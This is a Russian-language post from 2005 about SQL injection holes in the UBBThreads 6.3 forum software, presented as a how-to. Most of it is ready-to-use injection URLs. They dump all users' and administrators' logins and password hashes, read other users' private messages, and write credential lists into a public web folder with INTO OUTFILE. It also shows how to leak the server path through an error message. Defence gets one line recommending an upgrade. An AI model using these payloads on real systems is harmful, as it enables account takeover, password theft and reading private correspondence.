UBBThreads 6.3

21 октября 2005 | ASSCOL | Security

Описание:

http://urlubb.com/showmembers.php?Cat=&like= 1'%20union%20SELECT%20U_LoginName,U_Registered, U_Extra1,U_Password,U_TotalPosts,U_Extra1,U_ Number%20FROM%20w3t_Users%20WHERE% 20U_Status='Administrator'/*

1. Выводим логины и хеши паролей всех юзеров…

http://forum.ru/showmembers.php?Cat=&like= 1'%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users/*
http://forum.ru/showmembers.php?Cat=&like= 1'%20union%20select%20U_LoginName,0,0, U_Password,0,0,0%20from%20w3t_Users where U_Status='Administrator'/*

Выводим пассы всех админов… Заменяем Administrator на Moderator и получаем тоже тока для модеров….

2. Читаем чужие приваты…

http://forum.ru/viewmessage.php?Cat=&message= 1%20or%201=1%20and%20t1.M_Number= ТУТ ПИШЕМ НОМЕР ПРИВАТА КОТОРЫЙ ХОТИМ ПОЧИТАТЬ/*

Например:

http://forum.ru/viewmessage.php?Cat=&message= 1%20or%201=1%20and%20t1.M_Number=3/*

3. Пишем все логины с паролями в файл на серваке:

http://forum.ru/viewmessage.php?Cat=&message= 999999999%20union%20select%20U_LoginName, 0,0,0,0,U_Password%20from%20w3t_Users% 20where%201=1%20into%20outfile%20'/ПУТЬ ДО ФОРУМА/images/icons/info.txt'/*

Путь можно узнать так: http://31337.org/showmembers.php?Cat=&like=0' — вылезет ошибка и там видно путь…

4. Получаем список логинов всех юзеров..

http://forum.ru/showflat.php?Cat=&Number =999999%20union%20select%200,U_Login Name%20from%20w3t_Users%20where%2 01=1%20into%20outfile%20' /var/www/html/forum/images/icons/info1.txt'

Меняем U_LoginName на U_Password, info1.txt на info2.txt и в файле info2.txt получаем пасы всех юзеров… Примерно так:

http://forum.ru/images/icons/info2.txt

Не так давно на www.xakep.ru опубликовали статью, повествующую о взломе крупнейшего российского хостинга Valuehost. Выяснилось, что некий w00t нашел баг в форуме UBB.Threads, который позволял выводить хэши всех админских и юзерских паролей. Из-за дикой популярности борды сотни крупных порталов в момент стали уязвимыми. Совсем недавно появился перловый эксплойт, выводящий все хэши прямо в консоль хакера. Эксплойту передаются два параметра: хост и каталог, где расположен форум (по дефолту /ubbthreads/). После анализа опций деструктивный скрипт посылает кривой запрос серверу, в результате чего последний сдает все админские пароли.


Защита:

В финальных версиях UBB (6.4-6.5) баг отсутствует. Но раскрученная борда является платной, поэтому за безопасность хозяину сайта нужно выложить большую денежку. Или установить другой форум :).

**** ASSCOL ****

По всем вопросам и предложениям пишите на admin@comp-info.ru